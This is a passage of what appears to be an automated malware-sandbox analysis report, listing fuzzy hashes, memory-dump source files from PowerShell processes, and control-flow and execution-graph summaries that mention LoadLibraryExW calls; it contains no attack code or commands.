                                                                                                                          • Opcode Fuzzy Hash: 1cfe02ec0181788135e46d913ad6f6b500a5ebe683c888e75d57964a6ac40a6a
                                                                                                                          • Instruction Fuzzy Hash: 45D1F431B1DA494FEBE4DB1D88A86B577E1EF5A310B1801BED54DC32A2DE29EC41C741
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2e1ec52dda7c00343d1e7f12e71e8f34d704b94f140fed623e44e6cb99079b31
                                                                                                                          • Instruction ID: 3a5d0040072de47ef1dc90d335de50e6c218fba4d3b259a60d3b00a1ce50bacc
                                                                                                                          • Opcode Fuzzy Hash: 2e1ec52dda7c00343d1e7f12e71e8f34d704b94f140fed623e44e6cb99079b31
                                                                                                                          • Instruction Fuzzy Hash: ACD19670608A8D8FEB68DF28C8557F93BD1EF56310F44817AD84DC7292DA78A945CBC1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2673827516.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34840000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2f87b512d03d1c9b866a6506a6780d1f29f2ba1f810b775c7963ada0d9a33160
                                                                                                                          • Instruction ID: b17aba7e3b1f8b896113b1207e2294bd56f2e14961c6611c243e8f660d7b07fd
                                                                                                                          • Opcode Fuzzy Hash: 2f87b512d03d1c9b866a6506a6780d1f29f2ba1f810b775c7963ada0d9a33160
                                                                                                                          • Instruction Fuzzy Hash: 35A1F132F0DA8A4FEB94DB1884A567877E1FF5A714F5801BAD60DC7292DE29AC028740
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2673827516.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34840000_powershell.jbxd
Memory Dump Source
• Source File: 00000006.00000002.2673827516.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd34840000_powershell.jbxd
Memory Dump Source
• Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
Memory Dump Source
• Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
Memory Dump Source
• Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
Memory Dump Source
• Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
Strings
Memory Dump Source
• Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
Similarity
• String ID: N_^$N_^$N_^$N_^
• API String ID: 0-3900292545

Execution Graph

Execution Coverage: 3.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
[Execution graph image: three nodes, one path through a LoadLibraryExW call]

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000D.00000002.2863320233.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffd34840000_powershell.jbxd
Similarity
• String ID: 1B_L
• API String ID: 0-1485067606

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2862189293.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffd34770000_powershell.jbxd
Similarity
• API ID: LibraryLoad
• API String ID: 1029625771-0

Control-flow Graph

[Control-flow graph image, executed and not-executed blocks marked; the executed path passes through a LoadLibraryExW call]
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2862189293.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffd34770000_powershell.jbxd
Similarity
• API ID: LibraryLoad
• API String ID: 1029625771-0

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000D.00000002.2863320233.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffd34840000_powershell.jbxd
Similarity
• String ID: 1B_L
• API String ID: 0-1485067606

Control-flow Graph

[Control-flow graph image, executed and not-executed blocks marked; no API calls on the graphed path]
Memory Dump Source
• Source File: 0000000D.00000002.2863320233.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffd34840000_powershell.jbxd